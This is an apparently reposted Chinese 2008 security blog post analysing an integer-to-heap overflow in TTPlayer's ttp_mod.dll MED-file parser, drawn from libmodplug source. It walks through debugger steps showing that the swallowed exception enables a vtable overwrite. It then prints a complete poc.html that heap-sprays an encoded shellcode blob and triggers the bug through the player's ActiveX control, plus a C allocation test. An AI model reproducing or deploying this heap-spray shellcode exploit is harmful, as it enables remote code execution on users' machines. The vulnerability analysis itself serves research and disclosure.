本文共 3336 字，大约阅读时间需要 11 分钟。

导读：

千千静听ttp_mod.dll解析med文件堆溢出的利用分析

---------------------------------------------------------------------------Author: void[at]ph4nt0m[dot]org Blog:   Date:   2008-03-31

    这个洞是dummy牛发现的,当时我只是看了有问题的源码就觉得最多DoS,没有去实际测试分析,惭愧.没想到dummy牛利用成功.这里事后分析一下:-)

    千千静听ttp_mod.dll用的是开源代码,源代码链接:  

   

    出问题的源代码是gst-plugins-0.8.3/gst/modplug/libmodplug/load_med.cpp里的:

698   // Song Comments

699   UINT annotxt = bswapBE32(pmex->annotxt);700   UINT annolen = bswapBE32(pmex->annolen);701   if ((annotxt) && (annolen) && (annotxt+annolen <= dwMemLength))702   { 703    m_lpszSongComments = new char[annolen+1];704    memcpy(m_lpszSongComments, lpStream+annotxt, annolen);705    m_lpszSongComments[annolen] = 0;706   }

    这是个很典型的整数溢出.annolen为0xFFFFFFFF(即有符号整数-1)时,导致703行new char[0],有趣的是这个0字节分配居然成功返回(测试见注[1]),所以即使703行后加上类似if(m_lpszSongComments){...}的检查代码,也无济于事.

        

    704行进行memcpy,因为annolen为0xFFFFFFFF,毫无疑问导致了堆溢出,触发内存读/写越界异常.这里更有意思:    用od开启ie,载入poc.html(见注[2]),test.mod构造详见dummy的文章.    当ttp_mod.dll在memcpy触发越界异常后,打开SEH链窗口,将ttpctrl.dll的所有异常处理例程F2断下,Shift+F9忽略异常继续.

    在ttpctrl.04EE73F1暂停,进入了CxxFrameHandler异常处理流程,F9继续运行,可以看到这个异常被千千静听处理掉了!这里很关键,直接导致后续的虚函数指针覆盖和HeapSpray利用的可能.如果异常处理例程都不进行处理,只能导致Crash!

    最后,shellcode运行,突然弹出来一个窗口,很黄很暴力,我赶紧把它给关了.    

    除了这个load_med.cpp有问题外,这个源码包好几处都存在类似问题,有兴趣的可以看看.

注释:注[1]: malloc(0)的行为: 关于new char[0]堆分配的测试代码:

---[Cut Below]------------------------------------------------------------------------

#include void main() { int len=0, i=0; char* p; len = -1; p = new char[len]; printf("alloc 0x%08X Bytes at %p/n", len, new char[len]);

len = 0;

p = new char[len];printf("alloc 0x%08X Bytes at %p/n", len, new char[len]);while(1){    p[i++] = 'A';}}---[Cut Above]------------------------------------------------------------------------

注[2]:

poc.html代码

---[Cut Below]------------------------------------------------------------------------

<script >var heapSprayToAddress = 0x0c0c0c0c;var shellcode = unescape("%u0eeb%u4b5b%uc933%uc6b1%u3480%ufe0b%ufae2%u05eb%uede8%uffff%u17ff%ufe5d%ufefe%u94a1%ua7ce%u759a%u75ff%uf2be%u8e75%u53e2%u9675%u75f6%u9409%ua7fc%ubd16%ufefe%u1cfe%u9607%ucccd%ufefe%u8b96%u9b8d%uaa8c%ue801%u166b%ufed0%ufefe%u96ac%u8c91%ufe99%u9a96%u8a91%u96a3%uce8a%ua593%u8e96%uca96%u9690%u9fa5%ua38a%u8896%u9791%u759a%u7322%uf2b8%uadac%uacae%ua801%u01f6%ufaa8%ua8af%u8b75%u75c2%ud08a%ufd86%ua80b%u8875%ufdde%ucd0b%ub737%u53bf%u3bfd%u25cd%u40f1%uc4ee%u8a28%u3ff6%uf935%u24fd%u15be%uc50f%u8be1%ua019%ua075%ufdda%u9823%uf275%u75b5%ue2a0%u23fd%ufa75%ufd75%u553b%ua7a0%u163d%u01a6%u0101%u8acc%uf26f%u779d%ub12f%uf494%ue0c6%u2244%u3845%u44d2%u4f22%u3f57%udf58%u00fe");var heapBlockSize = 0x100000;var payLoadSize = shellcode.length * 2;var spraySlideSize = heapBlockSize - (payLoadSize+0x38);var spraySlide = unescape("%u0c0c%u0c0c");spraySlide = getSpraySlide(spraySlide,spraySlideSize);heapBlocks = (heapSprayToAddress - 0x100000)/heapBlockSize;memory = new Array();for (i=0;i { memory[i] = spraySlide + shellcode; } function getSpraySlide(spraySlide, spraySlideSize) { while (spraySlide.length*2 {       spraySlide += spraySlide; } spraySlide = spraySlide.substring(0,spraySlideSize/2); return spraySlide; } //ttp.URL="c://test.mod"; //ttp.URL=" "; //ttp.controls.play(); setTimeout('ttp.URL="c:/test.mod";ttp.controls.play();',1000); //setTimeout('ttp.openURL(" ); </script> ---[Cut Above]------------------------------------------------------------------------

本文转自

转载地址：http://jjiob.baihongyu.com/